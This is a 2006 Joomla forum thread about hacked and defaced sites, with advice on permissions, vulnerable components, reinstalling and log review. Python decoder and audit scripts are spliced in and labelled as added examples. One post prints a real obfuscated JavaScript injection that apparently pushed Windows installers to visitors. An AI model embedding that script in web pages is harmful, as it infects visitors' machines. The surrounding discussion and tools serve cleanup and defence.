Joomla! Discussion Forums



Posted: Tue Apr 11, 2006 9:15 pm 
Joomla! Master

Joined: Thu Aug 18, 2005 7:13 am
Posts: 13237
Hannes wrote up an excellent thread about the steps to take if you have the unfortunate luck to have a hacked website. The thread can be found here.

The text isn't set in stone; if there is certain information that might be useful, please post it here so he can update it.

_________________
Antonie de Wilde - Forum admin
All Joomla! release dates and days between releases: http://jfoobar.org/blog/189-days-betwee ... a-releases.test


Last edited by Tonie on Tue Apr 11, 2006 9:17 pm, edited 1 time in total.

Posted: Tue Apr 11, 2006 9:39 pm
Joomla! Ace

Joined: Fri Aug 12, 2005 3:02 pm
Posts: 1409
Some great information here, I've bookmarked it! heh.

_________________
rhuk
http://www.rockettheme.com - RocketTheme Template Club
http://www.rockettheme.com/aff - RocketTheme Affiliate Program


Posted: Tue May 09, 2006 6:10 pm
Joomla! Apprentice

Joined: Tue May 09, 2006 6:04 pm
Posts: 12
My site was running fine and then this happened after 1 week: http://joram.biz/ I've waited and it's not going away.
My hosting server is fine because other sites that are not running on Joomla are perfect.

The only third party component was loudbot/loudblog

Thanks


Posted: Tue May 09, 2006 6:38 pm
Joomla! Virtuoso

Joined: Fri Sep 16, 2005 8:41 pm
Posts: 3652
Location: NRW - Germany
This means that Joomla can't connect to your database. (I think, I don't know all the number codes off the top of my head... ;) You see the number 2 below the offline message? That's the information about what's wrong.)

_________________
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.


Posted: Tue May 09, 2006 9:26 pm
Joomla! Apprentice

Joined: Tue May 09, 2006 6:04 pm
Posts: 12
Thanx for the info.
I tried repairing the DB and nothing changed, instead I made a new installation.  :laugh:


Posted: Thu May 25, 2006 6:22 am
Joomla! Apprentice

Joined: Wed Apr 26, 2006 1:26 am
Posts: 10
Hi

I am experiencing the same thing...with the #2 below the " wwws.org
This site is temporarily unavailable.
Please notify the System Administrator
2

What is it?

It happened twice now. It came back this afternoon and 5 hours later it did the same thing again.

What I was doing the first time is that I was updating my Sitemap going to Google's homepage and I clicked on the Joomap? When the site went back on this afternoon I went and updated my Sitemap again as I didn't think it was the one that is wrong with it, then later after that the site became sluggish and sure enough it went offline again with that message.

Can anyone figure what is wrong?

Thanks!

_________________
Free Link Submission.
http://wwws.org


Posted: Fri May 26, 2006 3:13 am
Joomla! Apprentice

Joined: Wed Apr 26, 2006 1:26 am
Posts: 10
Well, this was a no-brainer after all. I was hacked :'( After reinstalling and bringing the site back, about 8 hours in operation again...Poof! Site no more; all files are deleted by the hacker.

_________________
Free Link Submission.
http://wwws.org


Posted: Fri May 26, 2006 3:51 pm
Joomla! Virtuoso

Joined: Sun Aug 21, 2005 2:25 pm
Posts: 4103
Location: Somewhere Near Here
The message with the number 2 means that there are issues connecting to the database.  Could it be that your hosting service is deleting your files? 

_________________
Love good music, especially the blues? http://www.jennifermarriott.com
Need a Joomla Consultant? http://www.marpomultimedia.com
JOOMLA ROCKS


Posted: Fri Jun 02, 2006 12:58 pm
Joomla! Apprentice

Joined: Wed Nov 16, 2005 3:09 pm
Posts: 11
Greetings all,

I am using Joomla 1.0.8 and I have several mods that have been added. I have a person who has now attacked my site 2 times, and at present this person is invoking a "javascript>document.write(unescape" command that has been encoded. I am unable to decode this script to find out where it's at.

I have passworded my Admin folder and I am presently seeking advice to plug this hole once and for all. Can anyone tell me how this person is adding Java scripts to my webpage???

This person first did this to my opening page, which was a simple HTML click to proceed to the Joomla side. I don't know how this person is making changes successfully to my site, but I would like to plug this hole ASAP!

I like Joomla, but I can't afford to have people editing my website at their will.

I will not post links as I don't want people to get any viruses, but I will post the script in CODE to show the exact nature of this embedded code.

Code:
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%71%29%7B%76%61%72%20%71%31%3D%75%6E%65%73%63%61%70%65%28%71%2E%73%75%62%73%74%72%28%30%2C%71%2E%6C%65%6E%67%74%68%2d%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%71%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%71%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2d%71%2E%73%75%62%73%74%72%28%71%2E%6C%65%6E%67%74%68%2d%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('+9IOLXGSK+86yxi+9J+88nzzv+9G55zxgllrugjy4otlu5u%7Bz4vnv+9Lyeoj+9J7+88+86%7Dojzn+9J%3B+86nkomnz+9J%3B+86yz%7Frk+9J+88joyvrg%7F+9Gtutk+88+9K+9I5OLXGSK+9K6')</script>


Please help me to find out how this person is changing my website at his will, or tell me what CHMOD setting I should change my subfolders to, to resolve this problem.

I am very concerned about this, and if I can't resolve this issue, I will be forced to remove Joomla, which I don't want to do.
Many thanks in advance. If you have any advice on this problem, please let me know.
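
A static decoder for the script layout posted above, as an added example that is not part of the original post: it reverses the dF() routine (unescape, subtract the trailing key digit from each character, unescape again) without executing any script. The sample input is constructed by hand and points at the placeholder host example.invalid; the function names are this example's own.

```python
import re

# Constructed sample with the same layout as the posted script: a
# percent-encoded stub, then dF('<payload><key digit>'). The payload was
# built by hand for this example and uses the placeholder host example.invalid.
SAMPLE_ARG = ("+9IOLXGSK+86yxi+9J+88nzzv+9G55k~gsvrk4ot|groj5+88+86%7Dojzn"
              "+9J%3B+86nkomnz+9J%3B+86yz%7Frk+9J+88joyvrg%7F+9Gtutk+88"
              "+9K+9I5OLXGSK+9K6")
SAMPLE_HTML = (
    "<html><body>Click to enter"
    "<script language=javascript>"
    "document.write(unescape('%66%75%6E%63%74%69%6F%6E%20%64%46'));"
    "dF('" + SAMPLE_ARG + "')</script></body></html>"
)

_PCT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(text):
    """Percent-decode the way JavaScript's unescape() does, as plain text."""
    return _PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def decode_df(arg):
    """Undo dF(): unescape, subtract the trailing key digit, unescape again."""
    if not arg or not arg[-1].isdigit():
        raise ValueError("payload does not end in a key digit")
    key = int(arg[-1])
    shifted = js_unescape(arg[:-1])
    # String.fromCharCode wraps modulo 65536, so mirror that here.
    plain = "".join(chr((ord(c) - key) % 0x10000) for c in shifted)
    return js_unescape(plain)


def find_injections(html):
    """Return one record per iframe tag hidden inside a dF('...') call."""
    findings = []
    for call in re.finditer(r"\bdF\(\s*'([^']*)'\s*\)", html):
        try:
            markup = decode_df(call.group(1))
        except ValueError:
            continue  # not this encoding scheme
        for tag in re.finditer(r"<iframe\b[^>]*>", markup, re.I):
            src = re.search(r"""src\s*=\s*["']?([^"'\s>]+)""", tag.group(0), re.I)
            hidden = re.search(r"display\s*:\s*none|visibility\s*:\s*hidden",
                               tag.group(0), re.I) is not None
            findings.append({"offset": call.start(),
                             "src": src.group(1) if src else None,
                             "hidden": hidden,
                             "markup": markup})
    return findings


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_HTML):
        print(hit["offset"], hit["src"], "hidden" if hit["hidden"] else "visible")
```

Run it over saved copies of index.php and any static HTML pages; the reported offset shows where in the file the injected call sits.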


Posted: Fri Jun 02, 2006 1:00 pm
Joomla! Virtuoso

Joined: Sun Aug 21, 2005 2:25 pm
Posts: 4103
Location: Somewhere Near Here
Can you block their IP?  Do you know who this person is?

_________________
Love good music, especially the blues? http://www.jennifermarriott.com
Need a Joomla Consultant? http://www.marpomultimedia.com
JOOMLA ROCKS


Posted: Fri Jun 02, 2006 1:35 pm
Joomla! Apprentice

Joined: Wed Nov 16, 2005 3:09 pm
Posts: 11
No, I do not know the actual person, but the only odd connection is coming from Italy. It's an ADSL connection with a dynamic IP address.

This person is adding lines of code to my index.php and they are embedding encoded scripts into the page. All of the Internet Explorer people are getting hit with Windows installers. Everyone who uses Firefox is not getting trampled.

I want to nix this hole. I have many files set to writable as per the install instructions. But this is really getting annoying. Is there some sort of FTP software embedded into the Joomla system?

Many thanks
Blacksteel


Posted: Fri Jun 02, 2006 1:44 pm
Joomla! Virtuoso

Joined: Sun Aug 21, 2005 2:25 pm
Posts: 4103
Location: Somewhere Near Here
Is your configuration.php locked down?  Can you list the mods you have installed?

_________________
Love good music, especially the blues? http://www.jennifermarriott.com
Need a Joomla Consultant? http://www.marpomultimedia.com
JOOMLA ROCKS


Posted: Fri Jun 02, 2006 1:57 pm
Joomla! Apprentice

Joined: Wed Nov 16, 2005 3:09 pm
Posts: 11
My configuration is listed as Writeable - I thought that was supposed to be set to that. (I don't have access to an FTP to make that change from work)

I have the following modules installed:

DOCMan v1.3.0 beta 4
Events  v1.1
Joomlaboard Forum v1.1.2 Stable

And that's it.


Posted: Fri Jun 02, 2006 2:01 pm
Joomla! Virtuoso

Joined: Sun Aug 21, 2005 2:25 pm
Posts: 4103
Location: Somewhere Near Here
Your configuration should only be writable when you are changing something in the global configuration.  All other times it should be chmod 644.

That may be your issue right there.

_________________
Love good music, especially the blues? http://www.jennifermarriott.com
Need a Joomla Consultant? http://www.marpomultimedia.com
JOOMLA ROCKS


Posted: Fri Jun 02, 2006 2:15 pm
Joomla! Apprentice

Joined: Wed Nov 16, 2005 3:09 pm
Posts: 11
Ok, many thanks I will look into this.

However, this issue is the 2nd attack. My first attack was done on an HTML (only splash screen) that was not a part of Joomla. Does this suggest to you that the FTP site was attacked or does Joomla have a way to edit HTML too??

I know it's the same person; the javascript is the same as before. So how is this person changing my HTML and have access to my configuration.php??

Many thanks for your help BTW!

Blacksteel


Posted: Fri Jun 02, 2006 2:27 pm
Joomla! Virtuoso

Joined: Sun Aug 21, 2005 2:25 pm
Posts: 4103
Location: Somewhere Near Here
Have you talked to your hosting provider?  Perhaps the issue lies with a server vulnerability rather than your specific site.

_________________
Love good music, especially the blues? http://www.jennifermarriott.com
Need a Joomla Consultant? http://www.marpomultimedia.com
JOOMLA ROCKS


Posted: Fri Jun 02, 2006 2:33 pm
Joomla! Apprentice

Joined: Wed Nov 16, 2005 3:09 pm
Posts: 11
I am already on that now.. Many thanks for your suggestions MMMedia!

I hope I can get this thing plugged up. It looks like I need to re-read the install FAQ..

Blacksteel


Posted: Tue Jun 06, 2006 2:09 am
Joomla! Apprentice

Joined: Mon Jun 05, 2006 10:58 pm
Posts: 6
Quote:
Have you checked the folder permissions?
A webserver has a sophisticated system to control the read, write and execute permissions of its files. If you give too much access to your folders, your server gets vulnerable and can be hacked easily. That's why you shouldn't give more than the standard 755 for folders and 644 for files. This is a number combination that represents a certain kind of read/write access. Basically you give full access to the owner of the file and only restricted access to others. The ownership is another problem and both are well discussed in the forum.


I am on a shared server.  What I find VERY odd is that the installation of Joomla went well and all dirs are owned by my account.
But I look in the templates directory.... The last template is owned by user nobody and the dir is 777 and files are 666.

I then look in the components directory.  GigCal, joomlaboard and xemusicgal are also owned by nobody, dir 777, files 666.. all others are owned by my account.

I had to get my host admin to change the xemusicgal ownership to me recursively so I could ftp large mp3 files manually.
After that, the xemusicgal component through the admin interface could not upload smaller mp3 files because it wants to write files as user nobody.  I ended up changing the perms to 777 for that directory as a result.


Is there any way to configure Joomla to create dirs and files with a specific owner?  I know there is a umask option inside the global config.  I may have messed up when I changed those umasks to 0777 and 0666.  But that still doesn't explain why the new components and template are owned by user nobody.


UPDATE...
I just changed the global config to use the server defaults for permissions.  I then changed the dir ownership to 755 and tried to upload a file using the xemusicgal admin interface.  Of course it says my file was uploaded successfully... poorly written I guess.
I check the mp3 dir and nothing is there.  I then change the dir perms to 777, reupload and look again....

-rw-r--r--  1 nobody  users    25133 Jun  5 22:17 comm01.mp3

ARRRGH ---- friggin nobody.  Good thing I can delete the file since I own the directory.

This is annoying.  someone smack me with a knowledge fish (or large trout for you old mIRC users).


Last edited by amcorona on Tue Jun 06, 2006 2:21 am, edited 1 time in total.
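
One way to check a Joomla tree for the conditions described in this post, as an added example that is not part of the original thread: it reports entries looser than the 755/644 ceiling quoted above, anything world-writable, and anything owned by a different user (such as nobody). The function name, and the assumption that the owner of the site root is the hosting account, are this example's own.

```python
import os
import stat
import sys

DIR_MAX = 0o755    # ceiling for folders quoted in the thread
FILE_MAX = 0o644   # ceiling for files quoted in the thread


def audit_tree(root, expected_uid=None):
    """Report paths looser than 755/644, world-writable, or owned by another uid."""
    if expected_uid is None:
        # Assumption: whoever owns the site root is the hosting account.
        expected_uid = os.stat(root).st_uid
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink modes are not meaningful
            mode = stat.S_IMODE(st.st_mode) & 0o777
            ceiling = DIR_MAX if stat.S_ISDIR(st.st_mode) else FILE_MAX
            issues = []
            if mode & ~ceiling & 0o777:
                issues.append("mode %03o exceeds %03o" % (mode, ceiling))
            if mode & stat.S_IWOTH:
                issues.append("world-writable")
            if st.st_uid != expected_uid:
                issues.append("owner uid %d, expected %d" % (st.st_uid, expected_uid))
            if issues:
                findings.append((os.path.relpath(path, root), issues))
    return sorted(findings)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, issues in audit_tree(target):
        print(rel + ": " + "; ".join(issues))
```

Files created by the web server process on a host set up like this one will show up under the owner check, which is the point: those are the paths the server user can rewrite.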

Posted: Fri Jul 14, 2006 11:45 pm
Joomla! Apprentice

Joined: Sat Jun 24, 2006 1:53 am
Posts: 32
Location: Canada
What kind of hack is this? And how do you think it can be fixed?
http://www.neo-fantasy.com

_________________
11 year old rawker ^.^ http://www.neo-fantasy.com


Posted: Sat Jul 15, 2006 2:23 pm
Joomla! Guru

Joined: Fri Aug 19, 2005 6:52 am
Posts: 699
Location: Bangsamoro Homeland
kaydeng wrote:
What kind of hack is this? And how do you think it can be fixed?
http://www.neo-fantasy.com


If that is your site, you are defaced. Delete it and do a fresh reinstall of Joomla. Also inform the admin of the server.

_________________
Moslemen M. Macarambon Jr.
http://moslemenjr.macarambon.com
http://www.joomlamoro.com - Joomla Bangsamoro Language, Team Coordinator


Posted: Sat Jul 15, 2006 7:35 pm
Joomla! Guru

Joined: Thu Aug 18, 2005 10:40 pm
Posts: 501
Location: Antalya
You don't need to delete and install a fresh Joomla if your site is defaced.
It's not a good idea to advise anybody to delete the site if the site is defaced.

It's easy to fix a defaced site.

You may have to check your template index.php, reload a fresh root index.php and index2.php, and check that configuration.php is OK.
Check chmods. Make sure you upgrade to Joomla 1.0.10.
Check all folders for Perl scripts. They upload BOTS and use your site for DDoS attacks in the future with that bot.
You need to find that script in the folders... check the cache folder too.

Check for iframe calls in the administration HTML files.
There are many different ways of hacking. It's hard to find what they did.
Usually they don't harm the site. They delete the admin account. You need to go to phpMyAdmin and create a new one.
Check the security forum and uninstall, upgrade or fix the components that hackers are using to get into your site.

Go to this site.... all the compromised components and modules are in that list:
http://forum.joomla.org/index.php/board,296.0.html

Maybe mods should write a list of what to check in hacked sites.

If your site is defaced.... on your main page in IE go to VIEW>>>SOURCE
Check the source and you will see the IFRAME codes that the hacker used.
Those codes give you a lot of ideas on how to fix your site.


You also need to make sure your files do not allow direct access, so check that you have included this at the top of each file:

Code:
// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );


Last edited by Anonymous on Sat Jul 15, 2006 7:57 pm, edited 1 time in total.

Posted: Sun Jul 16, 2006 3:18 am
Joomla! Virtuoso

Joined: Fri Sep 16, 2005 8:41 pm
Posts: 3652
Location: NRW - Germany
That's true bullshit. The hackers could have left some file somewhere deep in the folders of Joomla and you wouldn't notice it. They would be back in in a second. The only REALLY secure way to get rid of a hacker is to delete both the files and the db of Joomla and restore it from scratch. Of course you create a backup of all the stuff, to copy database entries or modified files after checking them back into the production system. But advising someone to NOT remove all files is like advising someone to not fix the brakes on a car after they got wrecked in an accident.

_________________
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.


Posted: Sun Jul 16, 2006 4:44 am
Joomla! Guru

Joined: Fri Aug 19, 2005 6:52 am
Posts: 699
Location: Bangsamoro Homeland
Yes.. it's possible that there are some kind of backdoors deep in your Joomla files.. that's why I suggest fresh files of Joomla 1.0.10.

I have some irregularities on some of my Joomla sites ...good thing I have a DB backup.. so I will just restore the DB and upload fresh Joomla 1.0.10 files. Though some of my sites are not yet fixed .. too busy with school stuff. Maintaining many Joomla sites is kind of painful if there's a security issue.  :(

_________________
Moslemen M. Macarambon Jr.
http://moslemenjr.macarambon.com
http://www.joomlamoro.com - Joomla Bangsamoro Language, Team Coordinator


Posted: Sun Jul 16, 2006 10:00 am
Joomla! Guru

Joined: Thu Aug 18, 2005 10:40 pm
Posts: 501
Location: Antalya
Some hackers deface a site and do not touch the database (inexperienced lamers).
If the database is clean, you can fix the site. Joomla keeps data in MySQL.
If the hacker modified the database and you do not have a database backup, the damage is done and you can't fix the site (if you do not have a database backup).

But if the site is defaced and the database is not harmed, try FTP Voyager.
FTP Voyager allows you to compare a known good configuration with your current one to see if there are any files/directories that have been added to your system. FTP Voyager allows you to do a diff between a site and a local copy to see what's different.
This way you can find hidden files that were added to your folders by hackers.
You should also inspect your logs, look for strange requests or search for strings like "/tmp" "/var/tmp", which are usually used to upload and execute rootkits and perl scripts. (Copied and pasted from a prior post.)
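
The comparison against a known good copy and the log search described above, sketched as an added example (not FTP Voyager and not code from the thread): it hashes a clean Joomla tree and the live tree, lists added, missing and modified files, and flags log lines that mention /tmp or /var/tmp. The function names, the script-extension list and the log lines are constructed for illustration.

```python
import hashlib
import os
import re
from urllib.parse import unquote

SCRIPT_EXT = {".php", ".pl", ".cgi", ".py", ".sh"}  # assumption: types worth a look
TMP_PATH = re.compile(r"/(?:var/)?tmp(?!\w)")         # "/tmp" and "/var/tmp"

# Constructed access-log lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jul/2006:09:58:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Jul/2006:09:59:12 +0000] "GET /index.php?x=/var/tmp/PLACEHOLDER HTTP/1.1" 200 312',
    '203.0.113.7 - - [16/Jul/2006:09:59:15 +0000] "GET /index.php?x=%2Ftmp%2FPLACEHOLDER HTTP/1.1" 200 312',
    '192.0.2.10 - - [16/Jul/2006:10:01:44 +0000] "GET /templates/site/css/template_css.css HTTP/1.1" 200 900',
]


def _digests(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            out[os.path.relpath(path, root)] = h.hexdigest()
    return out


def compare_trees(known_good, live):
    """Diff the live site against a clean copy of the same Joomla release."""
    good, cur = _digests(known_good), _digests(live)
    added = sorted(set(cur) - set(good))
    return {
        "added": added,
        "added_scripts": [p for p in added
                          if os.path.splitext(p)[1].lower() in SCRIPT_EXT],
        "missing": sorted(set(good) - set(cur)),
        "modified": sorted(p for p in set(good) & set(cur) if good[p] != cur[p]),
    }


def suspicious_requests(log_lines):
    """Return log lines that reference /tmp or /var/tmp, also when URL-encoded."""
    return [ln.rstrip("\n") for ln in log_lines if TMP_PATH.search(unquote(ln))]


if __name__ == "__main__":
    for line in suspicious_requests(SAMPLE_LOG):
        print(line)
```

Uploads, cache files and configuration.php will legitimately appear as added or modified, so review those entries by hand; the added_scripts list is the place to start looking for dropped Perl or PHP files.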


Posted: Wed Aug 16, 2006 7:46 pm
Joomla! Explorer

Joined: Tue Aug 30, 2005 3:40 pm
Posts: 278
Location: United States of America
Strange, another fix today on a 1.0.8 site.  I figured everyone would have done an update by now.  Hmmm, well nonetheless, I think the reason I've been able to track for the site hacks is not as deliberate as many would think.

In fact I'm almost willing to promise that a majority of sites being hacked are taking advantage of issues on cPanel type servers via a "BOT". After looking at the hosting sites on our servers that have Joomla, we notice that the same bot seems to tread the IP number and/or domains at almost the same time, and the one that got nailed was an older install of Joomla.

Nonetheless, until cPanel looks at the issue I've published a rather simple tutorial on how to somewhat shield yourself from these BOT type attacks.

http://forum.joomla.org/index.php/topic,11244.30.html



~ Jared

_________________
Smart people bridge with Joomla, not integrate
http://www.jaredritchey.com


Posted: Sun Sep 10, 2006 5:34 am
Joomla! Intern

Joined: Wed Dec 14, 2005 11:11 pm
Posts: 53
Location: asheville nc usa
Sadly, my site was hacked/defaced/whatever this morning. Bizarre world political crap statements with their tags on a changed index.php and index2.php files somehow. I was on 1.0.10 and found out and uploaded to 1.0.11 afterwards. Everything seems fine now; it's not a critical site so if it goes down again by hackers, I don't really give a crap, but it's more annoying than anything. And it does raise questions as to whether I should use Joomla for other clients.... I read the securities thread and it makes my head hurt reading it.

My hosting company said it was Joomla being vulnerable and it wasn't the server so not to worry... although it makes me worry about Joomla more than anything. Still trying to figure out how to view my access logs to see where it might have happened. Hopefully 1.0.11 is all good and this was just a political stunt.

_________________
barrett
pro:create.multimedia @ http://www.procreatemultimedia.com


Posted: Sun Sep 10, 2006 5:47 am
Joomla! Intern

Joined: Wed Dec 14, 2005 11:11 pm
Posts: 53
Location: asheville nc usa
Looking at the logs, it seemed to attack the com_comprofiler. Seems it was Community Builder.

_________________
barrett
pro:create.multimedia @ http://www.procreatemultimedia.com


Posted: Fri Sep 29, 2006 6:48 am
Joomla! Enthusiast

Joined: Tue Aug 30, 2005 9:25 am
Posts: 225
Location: Rosemont, PA USA
Hello all,

This is now the 3rd site to be hacked in the last few days.

All running off of the same hosting platform.

Please help if you are knowledgeable and especially if you are part of the Joomla team :)

first site as proof of hack:

http://www.waldorff.no/
there is now an index.html file that shows the hack crap which was not there before obviously.

http://www.waldorff.no/index.php = comes up with all sorts of errors because they also hacked configuration.php

finally they added this cute file: [cute is a VERY relative word]

http://www.waldorff.no/tema.php

Guvenlik Durumu - from the little research that I have made this would mean: Security Condition.

Please check this out.

I have converted most of my customers to Joomla and if this is going to happen to all of them, this is really NOT good for me.
:(

Thank you for your help in advance.

Sincerely,

Emmanuel Lemor


Posted: Fri Sep 29, 2006 7:18 am
Joomla! Enthusiast

Joined: Tue Aug 30, 2005 9:25 am
Posts: 225
Location: Rosemont, PA USA
Additional information:
Joomla v1.0.11

running:
PHP/4.4.2

uname -a: FreeBSD speedy.dnsprotect.com 4.9-RELEASE FreeBSD 4.9-RELEASE #1: Thu Feb i386

shared hosting with lypha.com

Honestly, I never checked to see if I have access to the server logs. I am asking the hosting provider; hopefully I will have access to them.

So far no information from them except they say the server has not been compromised.

Folder permissions are set in the only way that I could set them with this provider, which is 777 for folders; if I have them set to 755 then the Joomla install considers them non-writeable.

[I am sure this is part of the issue but the hosting provider won't do anything to change it], BUT the only file that gets defaced is the index.php and that does not have 777 rights of course, so I have a hard time believing that it is the fault of the folders having 777 rights...

Thanks for the help.
Sincerely,

Emmanuel Lemor.


Posted: Fri Sep 29, 2006 8:35 am
Joomla! Apprentice

Joined: Fri Sep 01, 2006 8:04 am
Posts: 46
Location: Berlin
More additional information is needed. Which modules/components are installed? Do you have register globals enabled or the register globals emulation?

Is your configuration.php writeable?

Have you read the security checklist? http://forum.joomla.org/index.php/topic,81058.0.html
Do you use .htaccess to block exploit attempts? http://forum.joomla.org/index.php/topic,75376.0.html
Have you looked if your installed Modules/Components are up to date? Here is a list of vulnerable Components http://forum.joomla.org/index.php/topic,79477.0.html

Greets

Jens


Last edited by kmekc on Fri Sep 29, 2006 8:38 am, edited 1 time in total.
